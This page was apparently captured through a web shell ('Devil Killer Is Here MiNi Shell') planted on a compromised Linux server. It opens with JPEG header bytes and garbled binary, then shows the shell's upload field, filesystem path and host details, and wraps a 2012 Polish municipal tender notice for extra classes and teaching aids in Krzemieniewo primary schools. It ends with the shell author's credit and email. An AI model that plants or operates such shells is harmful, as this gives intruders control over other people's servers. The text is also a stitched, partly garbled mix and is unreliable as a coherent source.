JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120809/293270-N-2012.html

<p class="kh_header"><b>Krzemieniewo: Zajęcia dodatkowe dla dzieci klas I-III i doposażenie szkół podstawowych 
w gminie Krzemieniewo</b><br>
<b>Numer ogłoszenia: 293270 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krzemieniewo , ul. Dworcowa 34, 64-120 Krzemieniewo, woj. wielkopolskie, tel. 0-65 5369200, faks 0-65 5297515.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krzemieniewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia dodatkowe dla dzieci klas I-III i doposażenie szkół podstawowych 
w gminie Krzemieniewo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, w zakresie, m.in. zajęć dla dzieci z trudnościami w czytaniu i pisaniu, problemami logopedycznymi i zagrożonych ryzykiem dysleksji, zajęć matematycznych, gimnastyki korekcyjnej oraz takich, które za zadanie mają rozwijać zainteresowania uczniów szczególnie uzdolnionych plastycznie i matematycznie, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. 
Celem głównym usługi jest wyrównywanie szans edukacyjnych poprzez wsparcie indywidualizacji procesu nauczania 230 dzieci z klas I - III we wszystkich szkołach podstawowych funkcjonujących w gminie Krzemieniewo w okresie 10 miesięcy, tj.: 
- szkoła podstawowa działająca w ramach Zespołu Szkół Szkoła Podstawowa i Gimnazjum im. Powstańców Wielkopolskich w Pawłowicach oraz Szkoła Podstawowa Filialna w Oporówku,
- szkoła podstawowa działająca w ramach Zespole Szkół Szkoła Podstawowa i Gimnazjum w Drobninie,
- szkoła podstawowa działająca w ramach Zespołu Szkół Szkoła Podstawowa i Gimnazjum im. Józefa  Ponikiewskiego w Nowym Belęcinie,
- szkoła podstawowa działająca w ramach Zespołu Szkół Gminy Krzemieniewo Przedszkole Szkoła Podstawowa w Garzynie.
Cele szczegółowe projektu to:
- podwyższenie wiedzy i umiejętności 230 dzieci klas I-III szkół podstawowych z terenu gminy Krzemieniewo, zgodnie z indywidualnymi potrzebami edukacyjnymi i rozwojowymi w okresie 10 miesięcy
- poprawa jakości nauczania 230 uczniów klas I-III szkół podstawowych z terenu gminy Krzemieniewo poprzez zakup środków dydaktycznych oraz sprzętu specjalistycznego do końca realizacji projektu.
I. Zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:
a.	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dyselksją: Ilość godzin - 210h łącznie dla wszystkich grup, Ilość grup - 7.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 2 grupy- 16h łącznie (I tura),
- SP Filialna w Oporówku 1 grupa - 8h łącznie (I tura)
- SP w Nowym Belęcinie 2 grupy - 16h łącznie (I tura)
- SP w Garzynie 1 grupa - 8h łącznie (I tura)
- SP w Drobinie 1 grupa - 8h łącznie (I tura)
- SP w Pawłowicach 2 grupy- 44h łącznie (II tura),
- SP Filialna w Oporówku 1 grupa - 22h łącznie (II tura)
- SP w Nowym Belęcinie 2 grupy - 44h łącznie (II tura)
- SP w Garzynie 1 grupa - 22h łącznie (II tura)
- SP w Drobinie 1 grupa - 22h łącznie (II tura)
Termin realizacji: 
-	56h od września 2012r. do grudnia 2012r. (I tura),
-	154h od stycznia 2013r. do czerwca 2013r. (II tura).
b.	Zajęcia logopedyczne :
Ilość godzin - 510h łącznie dla wszystkich grup.
Ilość grup - 17.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 3 grupy- 24h łącznie (I tura),
- SP Filialna w Oporówku 2 grupy - 16h łącznie (I tura)
- SP w Nowym Belęcinie 5 grup - 40h łącznie (I tura)
- SP w Garzynie 3 grupy - 24h łącznie (I tura)
- SP w Drobinie 4 grupy - 32h łącznie (I tura)
- SP w Pawłowicach 3 grupy- 66h łącznie (II tura),
- SP Filialna w Oporówku 2 grupy - 44h łącznie (II tura)
- SP w Nowym Belęcinie 5 grup - 110h łącznie (II tura)
- SP w Garzynie 3 grupy - 66h łącznie (II tura)
- SP w Drobinie 4 grupy - 88h łącznie (II tura)
Termin realizacji: 
-	136h od września 2012r. do grudnia 2012r. (I tura),
-	374h od stycznia 2013r. do czerwca 2013r. (II tura).
c.	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
Ilość godzin - 210h łącznie dla wszystkich grup.
Ilość grup - 7.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 2 grupy- 16h łącznie (I tura),
- SP Filialna w Oporówku 1 grupa - 8h łącznie (I tura)
- SP w Nowym Belęcinie 2 grupy - 16h łącznie (I tura)
- SP w Garzynie 1 grupa - 8h łącznie (I tura)
- SP w Drobinie 1 grupa - 8h łącznie (I tura)
- SP w Pawłowicach 2 grupy- 44h łącznie (II tura),
- SP Filialna w Oporówku 1 grupa - 22h łącznie (II tura)
- SP w Nowym Belęcinie 2 grupy - 44h łącznie (II tura)
- SP w Garzynie 1 grupa - 22h łącznie (II tura)
- SP w Drobinie 1 grupa - 22h łącznie (II tura)
Termin realizacji: 
-	56h od września 2012r. do grudnia 2012r. (I tura),
-	154h od stycznia 2013r. do czerwca 2013r. (II tura).
d.	Gimnastyka korekcyjna:
Ilość godzin - 270h łącznie dla wszystkich grup.
Ilość grup - 9.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej 
w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 2 grupy- 16h łącznie (I tura),
- SP Filialna w Oporówku 1 grupa - 8h łącznie (I tura)
- SP w Nowym Belęcinie 1 grupa - 8h łącznie (I tura)
- SP w Garzynie 2 grupy - 16h łącznie (I tura)
- SP w Drobinie 3 grupy - 24h łącznie (I tura)
- SP w Pawłowicach 2 grupy - 44h łącznie (II tura),
- SP Filialna w Oporówku 1 grupa - 22h łącznie (II tura)
- SP w Nowym Belęcinie 1 grupa - 22h łącznie (II tura)
- SP w Garzynie 2 grupy - 44h łącznie (II tura)
- SP w Drobinie 3 grupy - 66h łącznie (II tura)
Termin realizacji: 
-	72h od września 2012r. do grudnia 2012r. (I tura),
-	198h od stycznia 2013r. do czerwca 2013r. (II tura).
e.	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie:
Ilość godzin - 150h łącznie dla wszystkich grup.
Ilość grup - 5.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 1 grupa- 8h łącznie (I tura),
- SP Filialna w Oporówku 1 grupa - 8h łącznie (I tura)
- SP w Nowym Belęcinie 1 grupa - 8h łącznie (I tura)
- SP w Garzynie 1 grupa - 8h łącznie (I tura)
- SP w Drobinie 1 grupa - 8h łącznie (I tura)
- SP w Pawłowicach 1 grupa - 22h łącznie (II tura),
- SP Filialna w Oporówku 1 grupa - 22h łącznie (II tura)
- SP w Nowym Belęcinie 1 grupa - 22h łącznie (II tura)
- SP w Garzynie 1 grupa - 22h łącznie (II tura)
- SP w Drobinie 1 grupa - 22h łącznie (II tura)
Termin realizacji: 
-	40h od września 2012r. do grudnia 2012r. (I tura),
-	110h od stycznia 2013r. do czerwca 2013r. (II tura).
f.	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych matematycznie:
Ilość godzin - 150h łącznie dla wszystkich grup.
Ilość grup - 5.
Liczebność grup będzie zgodna z założeniami Rozporządzenia Ministra Edukacji Narodowej w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. 
- SP w Pawłowicach 1 grupa- 8h łącznie (I tura),
- SP Filialna w Oporówku 1 grupa - 8h łącznie (I tura)
- SP w Nowym Belęcinie 1 grupa - 8h łącznie (I tura)
- SP w Garzynie 1 grupa - 8h łącznie (I tura)
- SP w Drobinie 1 grupa - 8h łącznie (I tura)
- SP w Pawłowicach 1 grupa - 22h łącznie (II tura),
- SP Filialna w Oporówku 1 grupa - 22h łącznie (II tura)
- SP w Nowym Belęcinie 1 grupa - 22h łącznie (II tura)
- SP w Garzynie 1 grupa - 22h łącznie (II tura)
- SP w Drobinie 1 grupa - 22h łącznie (II tura)
Termin realizacji: 
-	40h od września 2012r. do grudnia 2012r. (I tura),
-	110h od stycznia 2013r. do czerwca 2013r. (II tura).
Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 
Za wypadki i szkody powstałe podczas usługi odpowiada Wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie Wykonawca.
Zamawiający ma prawo przeprowadzania kontroli prowadzonych zajęć. Wykonawca ma obowiązek prowadzenia monitoringu zajęć dydaktycznych na podstawie dziennika obecności, zdjęć. Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:
II. Doposażenie bazy dydaktycznej szkoły w Pawłowicach i filii w Oporówku:
III. Doposażenie bazy dydaktycznej szkoły w Garzynie
IV. Doposażenie bazy dydaktycznej szkoły w Drobninie
V. Doposażenie bazy dydaktycznej szkoły w Nowym Belęcinie
Rzeczy przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych, ćwiczeń, rehabilitacji oraz zajęć ruchowych - powinny, zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. 
Pomoce dydaktyczne, w tym sprzęt komputerowy muszą być fabrycznie nowe, nie używane.
Szczegółowy opis pomocy dydaktycznych oraz całego przedmiotu zamówienia znajduje się w rozdziale III Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 39.16.21.00-6, 39.16.21.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu nie jest wymagane posiadanie specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga wykazania przez wykonawców posiadania wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga wykazania przez wykonawców dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje:
- osobami (nauczycielami) z wyższym wykształceniem kierunkowym dla świadczonej usługi (załącznik nr 3 SIWZ) i minimum rocznym doświadczeniem w pracy pedagogicznej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niejszym postępowaniu Zamawiający nie wymaga wykazania przez wykonawców sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana warunków niniejszej umowy w stosunku do treści oferty Wykonawcy jest możliwa za zgodą stron, w następujących przypadkach:
a) zmiana terminów realizacji umowy - z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej albo z przyczyn losowych,
b) modyfikacja tematyki edukacyjnych zajęć dodatkowych - z przyczyn po stronie Zamawiającego lub Instytucji Pośredniczącej,
c) zmiany na korzyść Zamawiającego,
d) gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego,
e) innych szczególnie uzasadnionych przypadkach.
Niezależnie od przyczyn i warunków zmiany umowy wskazanych w ust. 1 zmiana warunków niniejszej umowy może nastąpić za zgoda stron także w przypadkach, gdy zmiany są dla Zamawiającego neutralne, np. zmiana adresu lub danych Wykonawcy lub Zamawiającego, zmiana osób reprezentujących Zamawiającego lub Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krzemieniewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Krzemieniewo, ul. Dworcowa 34, 64-120 Krzemieniewo (Sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:30, miejsce: Urząd Gminy Krzemieniewo, ul. Dworcowa 34, 64-120 Krzemieniewo (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywania szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com